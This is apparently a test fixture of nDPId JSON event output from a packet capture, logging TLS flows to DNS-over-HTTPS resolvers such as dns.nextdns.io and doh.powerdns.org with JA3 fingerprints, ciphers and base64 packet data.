-00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":946739380727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739380727,"pkt":"REREREREZmZmZmZmCABFAABosgVAAH4GiM0KAAABAQAAAdIqAbvH6z9rSWN0\/1AYAfXCFwAAFAMDAAEBFwMDADVke5XeBLKUZMMwsdywo3cwWM6dcwvPxEIBrrKuQwAVECVGBCt8L\/1vmMSczXlzhvKSsbEzJA=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":946739380870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":946739380870,"pkt":"REREREREZmZmZmZmCABFAAFEC7lAAH4G5eQKAAABLVocAII6AbvzwYfFjc3Z3lAYAfYLTQAAFgMBARcBAAETAwME0sG+tMqbxpRl1DV8Z2dnX5LfzpIiHTt74xC1bVbZqCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACkAAAAEwARAAAOZG5zLm5leHRkbnMuaW8ABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAghy6XniNnPGDj9u0r7tzchu6tmfTKqCDkZge3YRdGMjI="} -00903{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":358,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380870,"flow_last_seen":946739380870,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":946739380870,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02432{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAXUAxlAADQGM\/UtWhwACgAAAQG7gjqNzdne88GI4VAQAnmV4AAAFgMDAHoCAAB2AwNSUVDmrRSBFJr3VlpPTiOBfna69z7Ip3AgaZ4JY8XZPCBq5Am0FD9Ax\/Z0hd9jpGF+x36pK3fx2LqXRJeDdYghvhMBAAAuACsAAgMEADMAJAAdACBgLhCqxZDxBYT0wty93r8WAtFFYd34UV+f0SYd9yF0RxQDAwABARcDAwAgNdJG6I7V9ce0uN\/W8MyCm58pWjfsCFZXXJnMcWaU4P8XAwMJ4l4xzn1tklFeMfXUSkilkOHkR2CrV0Fk61C4hUjayiVX3XCUzF\/nVmk3NsjsUuGQs+ELPFl7aLMJpdeipyb\/BRKM7DDOdlmSjSZFpz3sI+4Ap1vb842GKpbBCp1KIgOgnmXfMMwnL4uKzNN2+XpL8V9LwuMNROahwk9tJrSx3BZQnvVy5qktKVugzkoTSb9fPpFovSjkUbQUBQuFWl2cxLyQBO6gjWiaDBpgoqREkqW2UGurTHpBXCvX7xTK+SGfs3VLNGPL\/jM509wXezmGXrBZolGpSBcCmwqP5AGjSUkJQ2KFF8\/5I5DLe1rWw\/7rCzdCJgW7dwItPpQigYvEpUhaTQyjzhLtXm4Br1gtr+Iuf0HPHYTCtm1Z9061ijlO7AesYAg3NSX4lpTeBeQNzqwAGQi0kxU+8BsfAI4uhNY4fwD\/tgZRm00kCDUGr0Hw1O0\/9wcQo2OrT4hVI8sBPv9rovACUd1xTXQBUu4c2UNVQr\/DAwgtr3oGHXN\/yf6hHksHqaO6ThyUELGPZgyTaAEJeYSlV\/UuFXosuXrXk+4M4bQmtm8xQA\/hPEgZw03CxD+XIQ9CziCJc2Lx3r4h2FdBiMwzohldpvHSBUXM2GuHl07Muv9yz1FfyzqYAimU2llIffa6XcR6\/N9ex4PCYrVYeRifJmT\/hN608lQ56Pm4ckRgIW72lS0ILwL91eG\/PWLw1TWr9OHqib8dqID1N28WvnDQAc1WG+OfvFA5Lx7KtiZ9\/3KI7f7RCYG\/5anpOjN3Yvo+yrHT\/\/9yxTpA2EDhXmw1I+drMKCfdVXEwoRqrQDXQ3qu16NE+piWO4zYtxH6MrZOf5GKUoqj85zhZkJ6n3Wtdfmw0p2w7uWnPZarz2kRT1hGv0H7uWAwQsIO2witiCTCAX0VhCKqX5eg9HlVQxEJ8e6aZG6udk28L+hlu2DjHm2cK3LT5siYCZ+61rOCmuWYzAzB4PZwDYNVRnV0GsHgMCnZc9N4\/ighhHZqiYL81av1zekzo7Qcc39eQmJB1\/vhuqI4+c3vKnv7ROdK1hsAX7hP\/VFs8H8ZF9FxFv36aFuAu1HQxIxhZTCwXDQcu5TzVx1PL5uguNjR7pwef7T5COi4aTCL27yji1k+uS4xQgf7uM7lfjr7UlwSz76e6z\/NdrgDABxN2pYomW51+xON8iXDOy0cXgxInpylLI6lmV7hJWGh+rssjjMTkzOSia\/tb6HN8MDXz8ND7qC4wdRBL+K2XXzk7CxXSZKHbU7oBKE3VuTcSRmB
vFAj4jzbuAW9nVI5Yw9M7KxJ0oNCiAer+7rkuV1\/dCwQt\/7\/zkSRGAemKSurrkjoqozLCUcuNRu2YlaJLAc\/PeEJmeHXWSos8ReOKG9libwm6aBbFjBhBGqk11oBFxYMJe3fE8zx0cKng5v141kUW5K8KykDBQPlm38itlnDfJBFaB9Jn9F1Dk+fc1GMvxAKNX1KD189yDAOfdy35szVs+4vU19xgaD3Asb+3zoIgGeHaF3v5zAsODf1V7zFmYGD1A5VyodE+SZcg8yBGqWdCjN6Dq7+yW5n4whEBATh9+W8PK0m19STC9EnY\/KFQ8CMbZglLaqGH9UHLlwuaNZUfgFyrj24dAMianUUp6I5pp2CbweoDVXgQfGbkHcfYC\/73I2CAYRQxi4XFXP\/UJ7vD4Iv633KLKMEpQYwdikhrjOP"} -00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":359,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739380870,"flow_last_seen":946739380903,"flow_idle_time":7440000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1736,"flow_avg_l4_payload_len":868,"midstream":1,"thread_ts_msec":946739380903,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.90.28.0","src_port":33338,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.nextdns.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02374{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":946739380903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1467,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1467,"pkt_l4_len":1433,"thread_ts_msec":946739380903,"pkt":"ZmZmZmZmRERERERECABFAAWtAxpAADQGNBstWhwACgAAAQG7gjqNzd+K88GI4VAYAnlzfQAACEkFkdj1Us7HE6XsQGxneQX\/pTaXJNHBzTBwjbjFH2PSLY9gxHervwko9HwLHhkgWdiRotlJENzv3dIlV0Q25g7GanzLzAoq\/bJLnF1bxRf0nf8R7xwqHIiEyWrnrfJqukts8v3m8MMBnkDAGd5xOmtynEVhFSJmjPZeWlanPH3W\/gPE9eVpcr\/bC8aD31d4wHJftv6KUYCRDzDXbCSoL\/6F7bgfENCEavhYW2LuID8zVPN+yKzb3WDD71Bfm\/QzlUMFQuZM5HbG0c7uIAOOAxkawVYPNiqL2TFCk1ynXFgmF4gXvbL\/HYrDLFRfjW4de\/NkjjSai08L+PfACua2q5oTvt2qGJPeolVEHsMmZEjEwazNhDwGqFKG5OP+F531r01cH7BTJcZ05QE7qXBrbvqwdtdoGPvG50ZEjeoenLq9i4bYfhTR7gqdrp+nT5HdXBlwZ3BA7TNBvRO28EIkDbwnbkKR1uAOgeHpmVvBpmpiphn4DYQZvVFKBDcAp0CgnjFhQ7BpU5nrco2WQPx+1Dj+wVwuk8wQg4nsuaxF9uoh5BJPTUJDd+oGcKzJnMyQnjiAungCkABFhOHccfPCI4WdjBjLMLNqgoxHw6DJHYylEKtOB9OnnXDF2J7Jvo9Dz26D1KrzmXsDWoLDC1fC96J8yd93fYvTZHskQxfY50BQIAKcBIdr8K4+MowCcaLlKXgQ2BvySvU9B5mJVdaqmTLF1fzesL+WRRK51q7IAwLh77wssc7jt76mm0H3PAWysYvmp\/NCiSKfjKaaLkm9x2NoEkekjBVCT4zJZaY12lyFWkBUvQQdolUu\/1tiRf86EnZ+MpspCpIhymi\/IUp68M\/Eb+2ljNKVmV1Er+pytZKFdhm+LxFZQDgPvwZts5tJVArrKTXEX7mbMUyNCFK87rJIQtF3h75H2QQdF8Dne8XAGsXDDnswycmS8W4DR2ei8Mvw6EchukCH49+5iX+zWw8yLNfbuXrdtwpsTWibehpgDGJwJ32GJ3PUhcT2O8ckRkT01hA4OhJ5s8FVi9G4sK5PSDUaW\/FVD5mXCOlbG6fI8ep93Cq318IKEa9gHWkRIcGP1KNeJ0vqPt6W+fiprWcAT+y38\/pHS\/DIldwWXxoakgp8kEgE10+BHsdUGoLtM0vHARs9JoXziCU\/gwCe4xJoYT7yIuKPLoyyOJzupzLZV+Yx6GthfYTU5x9FRZbuuSu\/4e+BWK3Ph42jg8FFm3MjO7iYnNl4v1+ChQKVR7XODNZWDH3jwqcZ8qhbkD9u5SI6j\/BA1C0rUPcBjh1+6XjoNgW\/MuFBBpUx0b9PcVFriOAhMdQziZ17xbnHnF7nwzD4ltsyPw098+Y62NYg0g7ZzmYgr7Bp\/OQu72rrzto9ZurPdNMKCU\/kuUSQfJNRXnpCKpphgwF89PQmt81ZhzDDg8jGUYjA+eCwP5b5c3W1mHz2rbpTYaJ5WAEPawg7kcD\/0daljt7SoSzY0j1SW+z8PqelVSwUwhQf5v+d
UBJntKDTvIA8dd3\/P5RebSAS6fwWCMpEa2Wpe0EbiTKfmmwomuAMmkjN4HlloVMdOTeEonHISxyYlgXipaeXT8CPFbuFXE4ejDU2aTkR9\/ZIbgoZdx7IXmaK+NxS9KICVTe0LPka0QmobSr15yArkyNHaP1EjswXAwMAYdZTBGnK4vcmbufHHRKWT+kPKyQO98Boq8AW86\/7q3c0DIh4T2TuGPAeaW+ueW75g7BJBBU7YuGFvnEEgi07qTSBXDL1UISZX8PwWOHA6mln36hZp5MmWU+JESIy2cQgYeQXAwMANQq+Suu4\/zFTPT1s4z\/CUiKzLUAWytPdwzfRZmXCp50PDxLOSYvzo75EbO+96Njs+ccRggY7"} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":946739385090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739385090,"pkt":"REREREREZmZmZmZmCABFAAFGrgFAAH4GLMUKAAABiJDXnsvQAbv3Oz1sep96IVAYAfYiJAAAFgMBARkBAAEVAwNZtcLiAhjzwZoFuSzepzhVh3+I+642bR2Bdc1go+HJvyB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG9oLnBvd2VyZG5zLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACBPoxVI1tXnUcUqsbORFpVub7e\/4DvFTpQM4hnCin1UEw=="} 
-00910{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385090,"flow_last_seen":946739385090,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739385090,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":946739385124,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":3170,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3170,"pkt_l4_len":3136,"thread_ts_msec":946739385124,"pkt":"ZmZmZmZmRERERERECABFAAxUg1ZAADcGk2KIkNeeCgAAAQG7y9B6n3oh9zs+ilAYAO0tMgAAFgMDAHoCAAB2AwNC32Ly6HNyagXW\/50d2q6qJAOmShuP86HMxipBKzBmwCB94\/ND5pNfeKEuu8RDLRRLZQtcZUnz37DmCj0UC1geOBMCAAAuACsAAgMEADMAJAAdACBiVzglBWvQOWIt\/inusfkCbeAeDbm6AiXUcYUQ0SeUdBQDAwABARcDAwAgVY3jrnTrJkAawm+Mv8gBTn6zfdywiZ3PkfSROpmIxNoXAwMKFapXpMK700YralL2NJ+2AqPfCUAacni3qdcZUnufsXl31+F2NSHowZS8bEZc4wYIOhESfjBH81NgZUBCJL0cGqDMG7c\/GafBLHylsDncbVfIqhYnumIxgnBjMekzN4Jr3Pc5g1dWYk4XIPvLeMa1AeLFQqOY+unh1DHuo4FV4KfjYjnh7ERuvhffEbloWyMHFdAQi8p2J65FwIVJHxtFX6hmaEMmHATlFHHOx1RIGQmbmA5r5k0vgPGiuUMBe1e8Ay6+kNyhTTutV32hMuU4\/4gl06pCrT6iDU4Fx4eNT+Bo6E12QIKo042tC7Wn8Kl\/KILiC4TaY1uTO0+LE4wVqs5DJHWwykde\/Mpu9moeLZ0VhV6Rnx2ocHW4rcz
n9gPX5qTiTrDgHO7CKCVp0Yo86Aw2suyeRkNR6Pz2DTuex3RC6JD+6hKlKYjQfx6kO1r8jKEZ8UZCGU+Rw2Pd2IT\/whiiT5Kf7zLPm28Fu5xYAFYob+TbRXBcQ0z8XUJIWzCMQvkjyj\/EBbyfhm8Iz194guweTL19Y3Q2XO+NnAUm9ihjSHpRimJ0Ale\/24shK7Q0gI7NtX4Sy93vR61pN+Zbul9p4+Mos8cFPIfYJPR5DmxNv9L\/cWnYOwtiE8KnRSAYR+6q3d\/0S6rIgkskZa1GGNAffeDtgnD5SVrh+YhdzCWZCb6834ULGghfWcw8DVqJTSeWttzs5JvcUzLfaxv2WQHaWCXuUpmCZy6HgKkW3jxYYWr2tyqizXXXq732dtVhz4LWmL9EHS1WzONzEhrNFQDtpAQ95k9MRPEdXjg0bNse0lpUI4AUqhIkxWgs0j+8YRzV3BBFFrpEwA3Ylhpo+Wbg8IG0hFyThCaHTvj0vN5WKh94GQCSIjO11AtJoS9k0tl5NWJ7dp2n0NCYI25hp41FivaF\/BBZqFxHTd\/4w8k1KmIQOky6ICw7WRykbaqxzUboD5Bq7peIuOsiwZoUMD+BDbF\/3fE\/CVHWoaOcr09A0PaL0PLhUDjARYyrR4LsVfpqkH4CZh+5Jr1aOIJ+zgcH7Gme4o7fpj5Ml+hu\/y+kOOZZN5J0XdtmvZE5w20Osrk+W9YsiLIeYNt9SB2i7LEsIRfsOrVhh9XsJ8\/VF+0Pp0BTxOsC+9Ft0\/Qj6hgm17CCVsOwdD0VhkUWaus1O+o2PGnC8v4FL3kFyyqT6BtubEcffH1AbvnEid+VZXXjMTJvMB6eWAs+UqpOrNnkCEZAK35TZ0tRUT\/0MJ65M3rSS8cnt+LL4apIWh9CenPODN35ZvH8b3XA1lwJHej3o7w4KZBEvRoLt8OxNNvwpgMfHbFpXZIqbODt95v1PnTJxwC\/vTEturbRIFjRNgt+KCX3zfwvULi6DBxiqBmChwECudELdgYVXSzaQF56hOrspt7m7cSP\/bSuhLgvGoeM7hRIXBgEFXWWobiqWKLPkIiUnd3zKygePoMYOZHF1u2D1V4jxKHpRJ6c0k9v9f8PV1\/2cqY\/66gHBBbRV41oC7rjWm5aIoPFQPYH0PovphDScGBnJ6jwAMRZhEh8stnUD5D9slPJ\/emP0c\/PTpb6PEHZyu0Q7qMTKM1bbEpBCcvYFzyVsCvmHuicyOKAs3xMxmCmWm4Eqf7griGXbNKYrhS8laSwuwkSEnXVtwhIr1b+a3aGOTQNdzJzZMKbJeIH1FS5VDDqACuwzlpn2\/PpEcmP5h\/q7H0tPqDs+gUGEHDMancSkknkDjnO8AWIHrv7XSmAw8MzBpM2IwCdCuY2dZXBowy6lZV\/inUY7ZvvXtbP6a8QnD\/\/IUygRpu63NQLm4VeKCFEprpn1cgwz5cL4vjrW8z1Oy+wINHvxXqkotg8FbTmtoSQdi7m2\/uaxkwXGvCE+Ey\/VyskJtt+1lkVPt6gqRb1ZVRQm9DD0JoMxHNgFOAaDrB+WFlvX4dGQvQzwATgRC8IKAuMZ8oKSe0p8HpA+6MvWjcmzVE8kVy6HlIQ+H75lU+B2jVUeDC7BKjayT8YnFAN9VHJiYBcwsc6cBByDnSSlpjY95o1fVD\/OvMoqArUx2Avc07VIGr\/MqkoiuFsBZpt7HMy13Sks4rLBRM4blbz1tgnQW4V9XKGhwXXv\/r\/C7JzoFDKo1O5LL2d9NrS47Pk6pIUPyJaZQjYfdcqsgSPEYWloR+Ff71Pv2pzjT7Sxhw7YViV\/havSqMuVAeVNrx2FMlZ7\/Bjxt5t67OkjvVTbouDt\/zCvvPnjRGuWwfp0n7UEFUPBk0VQxxGTP46k14fFISL3DGCnaRmvSrBlk9oDA6joQ7sLe2wbd3yp\/7JTFG1yDws5hd9oSrDxTaFhT45Qw3wjaIXqpHrD
VkIJVV3fSH3u051VvqUmuXNvgcA8QfJRF+xOWpwuJtANd+GaqvaC+iETLzkP5VxYMxDGAjzMI0o+7huhk06Ls+Jf4doAnMQ5xvzlXN0Jrm+66K6cwpPwq24uT0WBbVDSG8a63HdMk9Pitugm8gT5TfsMmkXcm8XvYm1EpxDTSUVXFdXoLfWyXIhhuACKArB7XcNbTOuzKmBQBNDeLFYB1E9Xt4xRs2cOc5M8BTSXsHSPQTYdc21dTZiVfSAP6\/2Gshg6m4bugupSvk5LVq6A3lh9ffmzYt3Db3zvnfSy\/Tt0BCYi48I1IzHC+nCbjFn40UDUHc5XrNCkmhQS1xNJg2qHFTjjUPePEW4+j3bBQRUYXBtmXyjbe7imkVYxn1jKZ8UW4USSgX9QTTgWMboFPNKvAGle0s4p63tKesbx5ZYZnXD1JMoq2wiuX3opjO2N0ancv\/RxoLDDssEhCe9dO3easTHhI9ARvh9rKZYKF6v6Kl1ISp1JmJSDWM7inua1o+4o1SDMyo05cBVGhhMTS\/9p3uBa3Q1+zink\/HkPt7+J8Qdeq8lFck+4f63IssnVRJTPYYtIlJvBDnEIzxlrIFjJvmSNN4lcsRZJPOIHxFfXw8TJRTgsvPxtdi3tSQFm4F+2sukCmWqPEy6giI87MQfoD2C\/Yj2M+9KXDCNq9W6tv2b4CTjfHZU+XTLbVYONSXTzAYgn5lkwz08bD2gqCs44qF\/KSJheO2v6XSQicbKpwE887mn21\/pZ1Aw7fFPdQKOSr+ozmKo3Hb7k8xRc9xS+jbMArySJEwlivY0HatI+S+fkF+iQUSFVepgBMwShL52IjMRPaDyXtnlg9nE04NDcI9V\/O40c8DJA21O6zuYXUndYIEnkJP\/UZOqiU4vEYGHHSxvu9z+OTP3HTmjMdAhSyUL1oGolZq+yT9EbInHY55rq655Oq72NwpUp+JpPgCJKsED+NjtqOZ3sxznqDpY1ghAohk4yNRdPDZzbaGgQemzPXCmXrFUsJTwcXd\/xU2NomnNTP3pmszYNUkgCR3tnkTvld9wZ\/IPs3fkgYPdntgi8PuMGjCH6ME+NhxjtV2MwDTodlIXAwMBGU0t8RnrdJi\/j1+SnvZYpC3oLybUZ0YAwC7FNMEEzD3PWZ1mQcdYkqPO6V4n6ARpcK+AxFYr2ZmYp5VZ6aP4ufUuA8CpPBGwUlNcZ3M2nwocOtccZ2oJCl6+gngVMfWFCnvPyKdJAIVEiwSYCs+M06T9K8Dn7IVtMoEfwHeIvTYluO2bnPQHkZLgVvtx4CODgchK9krbewpUgSyVMOqarNN5yC6WFzhdNiofu8YhqHlXXyYNaQehlZN2BSM6BAq9rstGdYvwLr32NuZBk40ppHqXSd1NL8zbf+k8yuXVg+g2tFIIoJcrHKG\/jMtPDHaZoxXSW0XP9QnmktFPm2sVrC8auYwtvIIcyHfmG4LUFWv9oOl2RWB0AiDdFwMDAEX95TGyYknbRQv3FxTdx\/ySOpsXyo9B3C1mQe9wKL+RuBQiooWFUmPWbB6tbYWNx9OjEFACLxCx4a2G5wYexWMh\/ScbEd4="} 
-00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739385090,"flow_last_seen":946739385124,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3402,"flow_avg_l4_payload_len":1701,"midstream":1,"thread_ts_msec":946739385124,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"136.144.215.158","src_port":52176,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.powerdns.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00569{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":946739385126,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739385126,"pkt":"REREREREZmZmZmZmCABFAAB4rgNAAH4GLZEKAAABiJDXnsvQAbv3Oz6Kep+GTVAYAfUhVgAAFAMDAAEBFwMDAEXEY3mnjR52mKqLxIMUmRZZcXFLr4uTi7u4xG7UfhN8KpUlgxkvImJLngXBZJdhlsdOO80qBVROy\/zQG1hjQj9e57h2KPE="} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00843{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":946739385216,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739385216,"pkt":"REREREREZmZmZmZmCABFAAFDj7xAAH4GQrYKAAABaBwAapkuAbuxqh8KTGGTY1AYAfYqeAAAFgMBARYBAAESAwMGpOiD7bGSBZJpQPwx8jjTz98dXRQiG2dJooZruAvSbiD6XuSv8nbXMIfp9OgUL1wdFi5SuPi3kly1rdyONGuyoAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG9oLmNyeXB0by5zeAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACCocx\/g1t9BSq0aHoBq6EokYegQUNndj200eG6GOsFbfA=="} 
-00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":390,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739385216,"flow_last_seen":946739385216,"flow_idle_time":7440000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739385216,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.28.0.106","src_port":39214,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.crypto.sx","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 